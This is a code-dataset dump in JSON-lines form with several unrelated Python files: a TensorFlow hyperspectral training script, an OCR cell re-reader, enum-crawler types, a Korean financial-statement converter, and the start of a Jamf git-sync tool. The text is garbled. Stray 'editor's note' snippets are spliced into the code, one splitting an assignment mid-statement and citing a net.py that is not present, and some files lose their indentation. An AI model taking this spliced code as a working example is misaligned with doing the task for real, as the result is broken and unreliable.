{"seq_id":"395769689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 10 21:35:41 2017\n\n@author: fs\n\n\nThis training script reads 20 tfrecords for the training set, in order to balance the dataset.\n\"\"\"\n\nimport numpy as np\nimport time\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom HSI_branch import HSI_branch\nimport tensorflow as tf\nimport os\nfrom datetime import datetime\nimport logging\nfrom read_record import Reader\nimport sys\nimport glob\n\nBATCH_SIZE = 512\nIMAGE_HEIGHT = 17\nIMAGE_WIDTH = 17\n\ndef view_bar(message, num, total):\n    rate = num / total\n    rate_num = int(rate * 40)\n    rate_nums = np.ceil(rate * 100)\n    r = '\\r%s:[%s%s]%d%%\\t%d/%d' % (message, \">\" * rate_num, \" \" * (40 - rate_num), rate_nums, num, total,)\n    sys.stdout.write(r)\n    sys.stdout.flush()\n\ncheckpoint_dir = 'ckpt'\ncheckpoint_file = os.path.join(checkpoint_dir, 'model.ckpt')\ntrain_dir='summary'\n\ndef initLogging(logFilename='record.log'):\n    \"\"\"Init for logging\n    \"\"\"\n    logging.basicConfig(\n        level= logging.DEBUG,\n        format='%(asctime)s-%(levelname)s-%(message)s',\n        datefmt = '%y-%m-%d %H:%M',\n        filename = logFilename,\n        filemode = 'w');\n    console = logging.StreamHandler()\n    console.setLevel(logging.INFO)\n    formatter = logging.Formatter('%(asctime)s-%(levelname)s-%(message)s')\n    console.setFormatter(formatter)\n    logging.getLogger('').addHandler(console)\n    \n    \ninitLogging()\n\ndef placeholder_inputs(batch_size):\n    hsi_pl = tf.placeholder(tf.float32,\n                            shape=(batch_size,IMAGE_HEIGHT,IMAGE_WIDTH,48))\n    \n    labels_pl = tf.placeholder(tf.int32, shape=(batch_size,))\n    \n    return hsi_pl, labels_pl\n\n\ndef do_eval(sess, step_name, HSIs_valid, labels_valid,hsi_pl, labels_pl, predicts1):\n\n    valid_examples = 141324\n    steps_per_epoch = valid_examples // BATCH_SIZE \n#    corrects = []\n    predicts= []\n    labels = []\n    for step in range(steps_per_epoch):\n        view_bar('valid ', step, steps_per_epoch) \n        hsi,label = sess.run([HSIs_valid, labels_valid]) \n        predicts_value1 = 
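# --- Editor's note: illustrative breakdown of the 12-element meta vector built by
# compose_image_meta() in net.py above; the slice boundaries follow the size=1/3/3/4/1
# comments there, and the example shapes below are made up.
import numpy as np

meta = np.array([7] + [480, 640, 3] + [512, 512, 3] + [16, 0, 496, 512] + [0.8])
image_id = int(meta[0])
original_image_shape = meta[1:4]
molded_image_shape = meta[4:7]
window = meta[7:11]      # (y1, x1, y2, x2) of the real image inside the padding
scale = float(meta[11])  # resize factor applied to the original image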
sess.run(predicts1, feed_dict= {hsi_pl:hsi, labels_pl:label})\n        predicts.extend(predicts_value1)\n        labels.extend(label)\n\n    matrix = get_matrix(labels,predicts)\n    draw_table(matrix,step_name)\n    \n    AA = np.mean(matrix[20,:20])\n    AR = np.mean(matrix[:20,20])\n    precision = np.mean(np.array(predicts)==np.array(labels))\n    logging.info('>>confusion matrix has been saved and AA={:.3f},AR={:.3f},precision={:.3f}'.format(AA,AR,precision))\n\ndef model_loss(logits1, labels):\n    with tf.variable_scope('caculate_loss') :\n        cross_entropy1 = tf.nn.sparse_softmax_cross_entropy_with_logits(\n            labels=labels, logits=logits1, name='corss_entropy1')\n        cross_entropy_mean1 = tf.reduce_mean(cross_entropy1, name='cross_entropy_mean1')\n        tf.summary.scalar('cross_loss1', cross_entropy_mean1)\n    \n    return cross_entropy_mean1\n\n\ndef model_training(variables1, loss1):\n    def make_optimizer(loss, variables, name='Adam'):\n        \"\"\" Adam optimizer with a fixed learning rate of 1e-4 and beta1 of 0.5\n        \"\"\"\n        global_step = tf.Variable(0, trainable=False)\n        learning_rate = 1e-4\n        beta1 = 0.5\n        learning_step = tf.train.AdamOptimizer(learning_rate, beta1=beta1, name=name).minimize(loss, global_step=global_step, var_list=variables)\n        return learning_step \n    \n    optimizer1 = make_optimizer(loss1, variables1, name='Adam_1')\n    ema = tf.train.ExponentialMovingAverage(decay=0.95)\n    assert len([var for var in tf.trainable_variables()])==len(variables1)\n    update_losses = ema.apply([loss1])\n\n    return tf.group(update_losses, optimizer1)\n\ndef model_predict(logits):\n    with tf.variable_scope('predict') : \n        predicts = tf.argmax(logits, axis=-1, name='predict')\n    return predicts\n\ndef get_matrix(labels, predicts):\n    '''\n    Rows are indexed by the ground-truth label and columns by the prediction;\n    this function returns the confusion matrix.\n    '''\n    matrix = np.zeros((21,21))\n    for i in range(len(labels)):\n        matrix[labels[i],predicts[i]] += 1 \n    \n    matrix[:20,20] = np.round(np.diag(matrix[:20,:20])/np.sum(matrix[:20,:20],axis=1),2)\n    matrix[20,:20] = np.round(np.diag(matrix[:20,:20])/np.sum(matrix[:20,:20],axis=0),2)\n    \n    return matrix\n    \ndef draw_table(matrix, step_name):\n\n    idx = pd.Index(np.arange(1,22))\n    cols = list(map(str,np.arange(1,22)))\n\n    df = pd.DataFrame(matrix, index=idx, columns=cols)\n    fig, axes = plt.subplots()\n    plt.figure(figsize=(20,10))\n    the_table=plt.table(cellText=df.values, rowLabels=df.index, colLabels=df.columns, \n                        colWidths = [0.03]*df.values.shape[1], loc='center',cellLoc='center')\n    \n    the_table.set_fontsize(15)\n    the_table.scale(2,2.1)\n    plt.axis('off')\n    plt.savefig('result_{}.png'.format(step_name),dpi=200)\n    \ndef run_train():\n    \"\"\"Train the HSI model for a number of steps.\"\"\"\n\n    with tf.Graph().as_default():  \n        records = glob.glob('data/*.tfrecord')  \n        train_readers = []\n        for record in records:  \n            record_name = 'train_data' + os.path.basename(record).split('.')[0]  \n            train_reader = Reader(record, name = record_name, batch_size=40)\n            train_readers.append(train_reader)  \n        \n        valid_reader = Reader('tiny_val.tfrecord', name='valid_data', batch_size=BATCH_SIZE)  \n        train_imgs_and_labels = [train_reader_.feed(train_data = True) for train_reader_ in train_readers]\n\n        HSIs_valid, labels_valid = valid_reader.feed(train_data = False)\n        hsi_pl, labels_pl = placeholder_inputs(BATCH_SIZE)\n        \n        HSI = HSI_branch()\n        logits1, outputs1, variables1 = HSI(hsi_pl,keep_prob=0.5)#(500, 2432)\n        predicts1 = model_predict(logits1)\n        loss1 = model_loss(logits1, labels_pl)  \n        \n        \n        train_op = model_training(variables1, loss1)\n        
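# --- Editor's note: tiny standalone sketch (invented label/prediction pairs) of the
# bookkeeping get_matrix() above performs: row sums give per-class recall, column
# sums give per-class precision.
import numpy as np

m = np.zeros((3, 3))
for label, pred in [(0, 0), (0, 1), (1, 1), (2, 2)]:
    m[label, pred] += 1
recall = np.diag(m) / np.sum(m, axis=1)     # per ground-truth class
precision = np.diag(m) / np.sum(m, axis=0)  # per predicted class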
summary = tf.summary.merge_all() \n saver = tf.train.Saver(max_to_keep=50)\n# init_op = tf.global_variables_initializer()\n sess = tf.Session()\n summary_writer = tf.summary.FileWriter(train_dir, sess.graph)\n# sess.run(init_op)\n saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir))\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n try: \n max_step = 50000 \n for step in range(15000,max_step):\n start_time = time.time() \n images_and_labels = sess.run(train_imgs_and_labels)\n HSIs, labels = [], []\n for hsi, label in images_and_labels:\n HSIs.extend(hsi)\n labels.extend(label) \n \n shuffle = np.random.permutation(range(len(labels)))\n HSIs = np.array(HSIs)\n labels = np.array(labels)\n \n HSIs = HSIs[shuffle][:BATCH_SIZE]\n labels = labels[shuffle][:BATCH_SIZE]\n \n _, loss_value, summary_str, predicts_value1 = sess.run([train_op, loss1, summary, predicts1],\\\n feed_dict={hsi_pl:HSIs, labels_pl:labels}\n )\n \n train_precision1 = np.mean(predicts_value1==labels)\n summary_writer.add_summary(summary_str, step)\n summary_writer.flush()\n duration = time.time() - start_time\n \n count = (step % 500) or 500\n message = ('>>Step: %d loss = %.4f acc = %.3f(%.3f sec) ETA = %.3f'\n % (step, loss_value, train_precision1, duration, (500-count)*duration))\n \n view_bar(message, count, 500)\n #-------------------------------\n if step % 500 == 0:\n logging.info('>>%s Saving in %s' % (datetime.now(), checkpoint_dir))\n saver.save(sess, checkpoint_file, global_step=step)\n \n logging.info('Valid Data Eval:')\n do_eval(sess,step,\n HSIs_valid, labels_valid, hsi_pl, labels_pl,predicts1\n )\n\n\n except KeyboardInterrupt:\n print('INTERRUPTED')\n coord.request_stop()\n\n finally:\n saver.save(sess, checkpoint_file, global_step=step)\n print('Model saved in file :%s'%checkpoint_dir)\n coord.request_stop()\n coord.join(threads)\n\n sess.close()\n\nif __name__ == '__main__':\n run_train()\n","sub_path":"training_method_1/train_hsi.py","file_name":"train_hsi.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602197202","text":"\"\"\"\nfunctions to OCR individual bbx's on a table region on an image to update the values in a data table\n\"\"\"\n\nimport cv2\nfrom file_ocr import TextOCR\nfrom copy import deepcopy\nimport numpy as np\nfrom lambda_reOCR.str_cleaners import note_fn, data_fn, header_fn\n\n\ndef nlp_output(value, output, col_type, header_fn, note_fn, data_fn):\n \"\"\"\n clean the ocr'd field\n \"\"\"\n if col_type == 'header':\n cleaned = header_fn(value, output)\n elif col_type == 'notes':\n cleaned = note_fn(value, output)\n elif col_type == 'data':\n cleaned = data_fn(value, output)\n else:\n raise IndexError('column type unknown')\n\n return cleaned\n\n\ndef reOCR(datatable, img_file, x_scale, y_scale, note_col):\n \"\"\"\n loop through the datatable for each element of text\n use bbx to calculate the roi on the image containing the text (remember scaling)\n scale and filter the roi\n reOCR the roi\n nlp the text - strip spaces, commas, currency signs\n apply the multiplier if identified\n validate each entry\n\n :param datatable: the extracted data table with only relevant data\n :return: cleaned_table: datatable with each element reOCR'd and nlp'd\n \"\"\"\n\n # todo - what is the minimum size for a good read > calculate the scale factor based on shape vs ideal\n\n # todo\n # create a temp directory\n # save the roi to tempdir\n # Q\n 
# creating a lot of bbx tiff files need to delete them\n\n cleaned_data_table = deepcopy(datatable)\n\n img_scale_factor = 2\n kernel = np.ones((1, 1), np.uint8)\n enlarge = 0.05\n img = cv2.imread(img_file)\n\n proc = TextOCR()\n\n for row_num, row in enumerate(datatable):\n for col_num, col in enumerate(row):\n if col:\n # the text in each bbx.\n value = col[0]['value']\n\n # calculate the bbx\n # roi = img[y,y+h : x:x+w]\n top = int(round(int(col[0]['top'])*y_scale*(1-enlarge/3)))\n bottom = int(round(int(col[0]['bottom'])*y_scale*(1+enlarge/3)))\n left = int(round(int(col[0]['left'])*x_scale*(1-enlarge/2)))\n right = int(round(int(col[0]['right'])*x_scale*(1+enlarge/2)))\n\n roi = img[top:bottom, left:right]\n img_dilation = cv2.dilate(roi, kernel, iterations=1)\n # img_erosion = cv2.erode(img_dilation, kernel, iterations=1)\n\n resized_roi = cv2.resize(img_dilation, None, fx=img_scale_factor, fy=img_scale_factor)\n\n blur = cv2.GaussianBlur(resized_roi, (5, 5), 0)\n\n # dynamic file naming\n filename = 'row{}_col{}.tiff'.format(row_num, col_num)\n\n cv2.imwrite(filename, blur)\n\n process_code, output, err = proc.scan(filename=filename)\n\n # todo - delete the temp file above\n\n decoded = output.decode('utf-8')\n\n # if process_code == 200:\n # print('mock log tesser output: {}'. format(decoded))\n # else:\n # print('tesser error: {}'.format(err))\n\n if col_num == 0:\n col_type = 'header'\n elif col_num == note_col:\n col_type = 'notes'\n elif col_num > note_col:\n col_type = 'data'\n else:\n raise IndexError('col type unknown')\n\n cleaned = nlp_output(value, decoded, col_type, header_fn, note_fn, data_fn)\n\n cleaned_data_table[row_num][col_num][0]['value'] = cleaned\n cleaned_data_table[row_num][col_num][0]['xmlnode'] = \"programmatically updated data value\"\n # print(cleaned_data_table[row_num][col_num])\n\n return cleaned_data_table\n","sub_path":"src/Parse_data/table_id/functions/lambda_reOCR/reOCR_table.py","file_name":"reOCR_table.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"205429526","text":"# -*- coding: utf-8 -*-\n\nfrom collections import namedtuple\n\n\nclass EnumElement(object):\n\tdef __init__(self, name, code_file, code_line, value=None, *args, **kwds):\n\t\tsuper(EnumElement, self).__init__(*args, **kwds)\n\t\tself.name = name\n\t\tself.code_file = code_file\n\t\tself.code_line = code_line\n\t\tself.value = value\n\n\t@property\n\tdef code_location(self):\n\t\treturn \"%s:%d\" % (\n\t\t\t\tself.code_file,\n\t\t\t\tself.code_line,\n\t\t)\n\n\tdef combine(self, other):\n\t\t# type: (EnumElement) -> None\n\t\tif other is self:\n\t\t\treturn\n\t\tif self.name != other.name:\n\t\t\traise ValueError(\"cannot combine two EnumElement instance with different name: %r @%s, %r @%s.\" % (\n\t\t\t\t\tself.name,\n\t\t\t\t\tself.code_location,\n\t\t\t\t\tother.name,\n\t\t\t\t\tother.code_location,\n\t\t\t))\n\t\tif self.value is None:\n\t\t\tself.value = other.value\n\t\t\tself.code_file = other.code_file\n\t\t\tself.code_line = other.code_line\n\t\telif (other.value is not None) and (self.value != other.value):\n\t\t\traise ValueError(\"cannot combine two EnumElement with conflict value: name=%r, value=%r @%s, %r @%s\" % (\n\t\t\t\t\tself.name,\n\t\t\t\t\tself.value,\n\t\t\t\t\tself.code_location,\n\t\t\t\t\tother.value,\n\t\t\t\t\tother.code_location,\n\t\t\t))\n\t\treturn\n\n\tdef __eq__(self, other):\n\t\tif (self.name == other.name) and (((self.value is None) and 
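# --- Editor's note: distilled sketch of the enlarge-crop-upscale step that reOCR()
# above applies to each cell before re-running OCR; the image and box coordinates
# here are placeholders.
import cv2
import numpy as np

img = np.full((100, 200, 3), 255, np.uint8)
top, bottom, left, right, enlarge = 40, 60, 50, 150, 0.05
roi = img[int(top * (1 - enlarge / 3)):int(bottom * (1 + enlarge / 3)),
          int(left * (1 - enlarge / 2)):int(right * (1 + enlarge / 2))]
roi = cv2.resize(roi, None, fx=2, fy=2)  # upscale to give the OCR engine more pixels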
(other.value is None)) or\n\t\t\t\t\t\t\t\t\t\t\t(self.value == other.value)):\n\t\t\treturn True\n\t\treturn False\n\n\tdef __ne__(self, other):\n\t\treturn not self.__eq__(other)\n\n\tdef __repr__(self):\n\t\treturn \"EnumElement(name=%r, code_file=%r, code_line=%r, value=%r)\" % (\n\t\t\t\tself.name,\n\t\t\t\tself.code_file,\n\t\t\t\tself.code_line,\n\t\t\t\tself.value,\n\t\t)\n\n\nCrawlerCallbacks = namedtuple(\"CrawlerCallbacks\", (\n\t\t\"outputpath_check_callable\",\n\t\t\"codefilepath_filter_callable\",\n\t\t\"enumelement_discover_callable\",\n\t\t\"enumelement_assign_callable\",\n\t\t\"codemap_write_callable\",\n))\n\"\"\"\nCrawlerCallbacks contains callback callables needed by enum element\ndiscovery-assign-generation process.\n\nArgs:\n\toutputpath_check_callable: (Callable[[str], bool]) check if given path is output code file.\n\tcodefilepath_filter_callable: (Callable[[str], bool]) check if given path is input or output code file.\n\tenumelement_discover_callable: (Callable[[Iterator[str], str], Iterator[EnumElement]]) fetch out enum element from given code content.\n\tenumelement_assign_callable: (Callable[[List[EnumElement]], None]) assign code value to enum element pairs.\n\tcodemap_write_callable: (Callable[[List[EnumElement]], None]) generate code-map code files.\n\"\"\"\n","sub_path":"enumnamecrawler/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"404159122","text":"# Program that converts KIS-Value standalone financial statements into raw data for EVAL, as of May 22, 2019.\n# Category definitions have been heavily revised.\n#\n\nimport requests\nimport pandas as pd\nfrom pandas import Series, DataFrame\n#import json\nimport sqlite3\nfrom pandas import ExcelWriter\nimport time\n\n# Specify the source database and build the list of tickers in the DB / list: PL --> moved into the main block\n\ndef DBlist(fileloc):\n    con = sqlite3.connect(fileloc)\n    cursor = con.cursor()\n    cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n    Plist = cursor.fetchall()\n    PL = []\n    for i in range(0, len(Plist)):  # store the company names from the DB in PL / list format\n        j = Plist[i][0]\n        PL.append(j)\n    return (PL)\n\n# Trimming step for the imported data\ndef import_com(com_code, fileloc):\n    con = sqlite3.connect(fileloc)\n    #df = pd.read_sql(\"SELECT * FROM '%s'\" % com_code, con, index_col='ACCODE')\n    df = pd.read_sql(\"SELECT * FROM '%s'\" % com_code, con)\n    return df\n\n\n# Routine that tidies the format of the imported data\ndef moddata(row_code):  # per-row import helper\n    # temp=df.ix[row_code]\n    temp = df.loc[row_code, '2014':'2018']\n    temp_a = pd.to_numeric(temp, errors='coerce')\n    temp_b = temp_a.fillna(0)\n    temp_b = temp_b.div(1000)  # convert KRW to thousands of KRW (and on to dollars)\n    return temp_b\n\ndef create_Eval_table_op(data):\n# Item-matching step - converts a file holding every record posted to KIS-Value as standalone financial statements\n    # Income statement\n\n    sales = moddata(3)  # Revenue\n    COGS = moddata(4)  # Cost of goods sold\n    COGS = COGS.mul(-1)  # expenses are negative\n    SGATotal = moddata(5)  # Total SG&A as reported in Korean financial statements\n    Dep = moddata(7)  # Depreciation\n    Amo = moddata(6)  # Amortization of intangibles\n    DeAm = Dep + Amo  # depreciation + amortization\n    DeAm = DeAm.mul(-1)\n    RD1 = moddata(8)  # Research expense\n    RD2 = moddata(9)  # Ordinary R&D expense\n    RD3 = moddata(10)  # Ordinary development expense\n    RDExpense = RD1 + RD2 + RD3  # Total research expense\n    RDExpense = RDExpense.mul(-1)  # expenses are negative\n    SGA = SGATotal + RDExpense + DeAm  # In the data table, SGA is kept separate from R&D and depreciation\n    SGA = SGA.mul(-1)  # expenses are negative\n    Interest_Exp = moddata(13)  # Interest (financial) expense\n    Interest_Exp = Interest_Exp.mul(-1)\n    #Interest_Income = moddata(14)+moddata(15)\n    #Net_Int = Interest_Income + Interest_Exp  # interest income - interest expense\n    #Min_int_E = moddata(17)  # minority-interest net income\n    #Min_int_L = moddata(16)  # minority-interest net loss\n    #Min_int_L = Min_int_L.mul(-1)\n    Min_Int_Earning = 0\n    
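# --- Editor's note: usage sketch for EnumElement.combine() from enumnamecrawler/types.py
# above; the enum name, files and value are invented for illustration.
a = EnumElement("ERR_IO", "main.c", 10)            # value not yet assigned
b = EnumElement("ERR_IO", "util.c", 22, value=3)
a.combine(b)                                       # a adopts b's value and location
assert a.value == 3 and a.code_location == "util.c:22"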
#Nonopincome = moddata(11)  # non-operating income\n    #Nonoploss = moddata(12) - Interest_Exp  # subtract interest expense back out of non-operating expenses\n    #Nonoploss = Nonoploss.mul(-1)  # expenses are negative\n    Temp_EBT = moddata(17)  # operating profit (loss)/125000\n    Temp_EBIT = moddata(19)  # income from continuing operations before income tax\n    Diff_I = Temp_EBIT - Temp_EBT\n    Nonopincomes = Diff_I +Interest_Exp\n    #Nonopincomes = Nonopincome + Nonoploss\n    IncomeTax = moddata(18)  # income tax expense\n    IncomeTax = IncomeTax.mul(-1)  # expenses are negative\n    Otherincome = 0  # equity-method income/loss\n    ExtItems = moddata(16)  # income from discontinued operations\n    # Balance sheet\n    CurrAcc = moddata(20)  # quick assets\n    OpCash = moddata(21)  # cash and cash equivalents\n    Market_Sec1 = moddata(22)  # short-term financial instruments\n    Market_Sec2 = moddata(23)  # short-term investment securities\n    Opc_Msec = OpCash + Market_Sec1 + Market_Sec2  # cash and cash equivalents\n    Receivables = moddata(24)  # accounts receivable\n    Inventories = moddata(25)  # inventories\n    OCA = CurrAcc - Opc_Msec - Receivables  # other current assets = quick assets - cash equivalents - receivables\n    PPE = moddata(28)  # property, plant and equipment\n    Investment = moddata(27)  # investment assets\n    Intangible = moddata(29)  # intangible assets\n    OA1 = moddata(30)  # other non-current assets\n    OA2 = moddata(31)  # deferred assets\n    #OA3 = moddata(32)  # other financial-industry assets\n    #OA4 = moddata(33)  # consolidation adjustment\n    Otherassets = OA1+OA2\n    # Liabilities\n    Acc_payable = moddata(43)  # accounts payable\n    IncomeTax_payable = moddata(33)  # deferred income tax liabilities (under current liabilities)\n    CurrLiab = moddata(32)  # current liabilities\n    OthCurrLiab = moddata(44)  # other current liabilities\n    CurrentDebt = CurrLiab - Acc_payable - IncomeTax_payable - OthCurrLiab  # current debt\n    noncurrentliab = moddata(34)  # non-current liabilities (total)\n    DefTax = moddata(35)  # deferred income tax liabilities (under non-current liabilities)\n    OthLiab = moddata(45) + moddata(36)  # other non-current liabilities + deferred liabilities\n    longtermdebt = noncurrentliab - DefTax - OthLiab\n    Minority_interest = 0  # minority (external) shareholders' equity\n    Pref_stock = moddata(38)  # preferred stock capital\n    Paidincommcap = moddata(37)  # common stock capital\n    N_CommStock = moddata(47)  # number of common shares issued\n    PreferredDiv = moddata(50) * (Pref_stock/(Pref_stock + Paidincommcap) )  # preferred dividends - outflow from capital surplus, etc.\n    PreferredDiv = PreferredDiv.mul(-1)\n    retainedequity = moddata(39)  # capital surplus\n    othercapital = moddata(41)  # capital adjustments\n    otherretained = moddata(42)  # accumulated other comprehensive income\n    retainedprofit = moddata(40)  # retained earnings\n    Retained_earnings = retainedequity+othercapital+otherretained+retainedprofit\n    Common_div = moddata(50) + PreferredDiv  # payment of dividends\n    Common_div = Common_div.mul(-1)\n    N_employee = moddata(49).mul(1000)\n\n\n    temp = {'01 Sales': sales,\n            '02 COGS': COGS,\n            '03 RDExpense': RDExpense,\n            '04 SGA': SGA,\n            '05 Depreciation and Amortization': DeAm,\n            '06 Interest_Expenses': Interest_Exp,\n            '07 Non operational income': Nonopincomes,  # non-operating income\n            '08 Income Tax': IncomeTax,  # income tax expense\n            '09 Minority Interest in Earning' :Min_Int_Earning,  # income under the equity method\n            '10 Other Income(Loss)' : Otherincome,  # other income\n            '11 Extra Items or discontinued business income': ExtItems,  # special/extraordinary items - unusual gains, disposals, etc. - income from discontinued operations\n            '12 Preferred Dividend': PreferredDiv,  # other portion of the decrease in capital surplus\n            '13 Operating Cash and Marketable Securities': Opc_Msec,  # cash and cash equivalents\n            '14 Receivables': Receivables,  # accounts receivable\n            '15 Inventories': Inventories,  # inventories\n            '16 Other Current Assets': OCA,  # other current assets\n            '17 PP&E': PPE,  # plant and equipment\n            '18 Investments': Investment,  # investment assets\n            '19 Intangibles': Intangible,  # intangible assets\n            '20 Other Assets': Otherassets,  # other non-current assets\n            '21 Current Debt': CurrentDebt,  # current debt\n            '22 Account Payable': Acc_payable,  # accounts payable\n            '23 Income Tax Payable': IncomeTax_payable,  # deferred income tax liabilities\n            '24 Other Current Liabilities': OthCurrLiab,  # other current liabilities\n            '25 Long term debt': longtermdebt,\n            '26 Other Liabilities': OthLiab,\n            '27 Deferred Tax': DefTax,  # deferred income tax liabilities\n            '28 Minority Interests': Minority_interest,  # minority shareholders' equity\n            '29 Preferred Stock': Pref_stock,  # preferred stock capital, EVAL p. 188\n            '30 Paid in Common Capital': Paidincommcap,  # common stock capital\n            '31 Retained Earnings': Retained_earnings,  # retained earnings\n            '32 Common Dividends': 
Common_div,  # payment of dividends\n            '33 Number of Common Stocks': N_CommStock,  # number of common shares\n            '34 Number of Employees': N_employee,\n            '35 Depreciation': Dep\n            }\n\n    df = pd.DataFrame(temp)  # gather into a DataFrame\n    df1 = df.transpose()  # swap the axes\n\n    #YR = ['2012/12', '2013/12', '2014/12', '2015/12', '2016/12', '2017/12(E)']\n    #df2 = df1.rename(columns={'DATA1': YR[0], 'DATA2': YR[1], 'DATA3': YR[2], 'DATA4':\n    #                          YR[3], 'DATA5': YR[4], 'DATA6': YR[5]})  # rename the index\n\n    return df1\n\ndef ticker_finder(ticker):\n    df = pd.read_excel('C:/a/koreantickers.xlsx',index_col = 'tick')\n    a = df['name'][ticker]\n    return a\n\ndef save_xls(list_dfs, xls_path, codes):\n    writer = pd.ExcelWriter(xls_path, engine='xlsxwriter')\n    for n, m in enumerate(list_dfs):\n        list_dfs[m].to_excel(writer, codes[m])\n    writer.save()\n\nif __name__ == \"__main__\":\n\n    #removeddb = []\n\n    PPL = DBlist('C:/a/ext1905byKISticker.db')  # load the ticker list ~ change this when refreshing\n    temp_df = {}\n\n    conn = sqlite3.connect(\"c:/a/evalrawkissIP1905.db\")  # create the new DB - change this when refreshing\n\n    for k, l in enumerate(PPL):\n        try :\n            df = import_com(l,'C:/a/ext1905byKISticker.db')  # process the data and return a DF - change this when refreshing\n            #code = df['2018'][1]\n            #sales2017 = df['2017'][3]\n            #print(df,code,sales2017)\n            #if code is None : #and sales2017 is not None:  # routine used when processing unlisted stocks\n            #if sales2017 and code is not None:  # routine used when processing listed stocks\n            df1 = create_Eval_table_op(df)  # store the processed data in df1\n            company_name = df.loc[2,'2018']\n            CS = df1.ix['33 Number of Common Stocks']  # pull the common-share count out separately to preserve units (thousands of shares)\n            EMP = df1.ix['34 Number of Employees']\n            DEP = df1.ix['35 Depreciation']\n            df1 = df1[:-3].div(1000)  # convert thousand-KRW to million-KRW (thousand USD); the share count is excluded\n            df1 = df1.round(2)\n            CS = CS.div(1)\n            DEP = DEP.div(1000)\n            df1 = df1.append(CS)\n            df1 = df1.append(EMP)\n            df1 = df1.append(DEP)\n            namemix = company_name + ' ' + l\n            print(namemix,k)\n            df1.to_sql(namemix, conn, if_exists='replace')\n            #temp_df[k] = df1  # data transformation for writing to Excel\n            #else:\n            #    pass\n        except:\n            pass\n    #save_xls(temp_df, 'C:\\\\a\\\\EvalRawfromKISSIP_1808.xlsx', PPL)  # create a new Excel file\n\n","sub_path":"KISALLIndnon_pubRAWDBtoRAWEVAL_1905.py","file_name":"KISALLIndnon_pubRAWDBtoRAWEVAL_1905.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"61903980","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"git2jss: sync your git repository with your JSS\n\nA fast asynchronous python library for syncing your scripts in git with your\nJSS easily. 
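# --- Editor's note: standalone illustration of the cleaning pipeline moddata() in the
# KIS-Value script above applies to each row (coerce to numeric, zero-fill gaps,
# rescale units); the sample Series is invented.
import pandas as pd

raw = pd.Series(['1500000', None, 'n/a'], index=['2016', '2017', '2018'])
clean = pd.to_numeric(raw, errors='coerce').fillna(0).div(1000)  # KRW -> thousand KRW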
This allows admins to keep their script in a version control system\nfor easy updating rather than googling and copy-pasting from resources that\nthey find online.\n\nExample:\n To sync the most recent commits to your JSS:\n\n % python3 sync.py --url https://company.jamfcloud.com \\\n --username git2jss-api-user\n\nUsage:\n Required flags:\n --url url for the JSS (https://company.jamfcloud.com)\n --username username in JSS with API privileges\n Optional flags:\n --password for CI/CD (Will prompt for password if not set)\n --do_not_verify_ssl skip ssl verification\n --overwrite overwrite all scripts and extension attributes\n --limit limit max connections (default=25)\n --timeout limit max connections (default=60)\n --retries retry n times after timeout (default=3)\n --verbose add additional logging output\n --update_all upload all resources in ./extension_attributes\n and ./scripts\n --jenkins to write a Jenkins file:jenkins.properties with\n $scripts and $eas and compare\n $GIT_PREVIOUS_COMMIT with $GIT_COMMIT\n\nAttributes:\n ARGS (argparse.Namespace): contains all of the arguments passed to\n ``sync.py`` from the command line. See ``get_args`` documentation.\n SLACK_EMOJI (str): The Jenkins file will contain a list of changes scripts\n and eas in $scripts and $eas. Use this variable to add a Slack emoji\n in front of each item if you use a post-build action for a Slack custom\n message\n SUPPORTED_EXTENSIONS (tuple): Tuple of (str) objects defining supported\n file extensions for scripts and eas.\n CATEGORIES (list): Empty list that will be filled by connecting to the JSS\n and downloading the existing categories.\n FILE_PATH (pathlib.Path): Path to the folder containing sync.py at\n execution. This is defined by the ``__file__`` attribute's ``.parent``\n S_HEAD (dict): Dictionary containing the headers used by ``aiohttp`` when\n making requests to the JSS.\n S_AUTH (None): Default ``None``, but populated with ``aiohttp.BasicAuth``\n at runtime with the ``ARGS.username`` and password provided by either\n ``ARGS.password`` or ``getpass.getpass`` at execution.\n JPS_URL (None): Default ``None``, but populated with ARGS.url.\n TIME_OUT (None): Default ``None``, but populated with ARGS.timeout.\n RE_TRIES (int): Default ``3``, but populated with ARGS.retries.\n\nTodo:\n * Make ``JamfObject`` a Factory to automate object creation.\n\n\"\"\"\n# pylint: disable=missing-docstring,invalid-name\nimport argparse\nimport asyncio\nimport getpass\nimport logging\nimport os\nimport pathlib\nimport subprocess\nimport sys\nimport urllib.parse as urlparse\nimport warnings\nimport xml.etree.ElementTree as ET\nfrom xml.dom import minidom\n\nimport aiohttp\nimport async_timeout\nimport uvloop\n\n# Logging configuration\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(levelname)7s: %(message)s\",\n stream=sys.stderr,\n)\nLOG = logging.getLogger(\"\")\nLOG.setLevel(logging.INFO)\n\n# Global Constants\nSLACK_EMOJI = \":white_check_mark:\"\nSUPPORTED_EXTENSIONS = (\".sh\", \".py\", \".pl\", \".swift\", \".rb\")\nCATEGORIES = []\nFILE_PATH = pathlib.Path(__file__).parent\nS_HEAD = {\"Accept\": \"application/xml\",\n \"Content-Type\": \"application/xml\"}\nS_AUTH = None\nJPS_URL = None\nTIME_OUT = None\nRE_TRIES = 3\n\n\nclass JamfObject(object):\n \"\"\"Base Class for all Jamf Object types (scripts, eas, etc.)\n\n Most actual functionality should be abstracted in this class, with any\n object requiring specific functionality having it added to their class.\n\n Attributes:\n folder (str): Name of the 
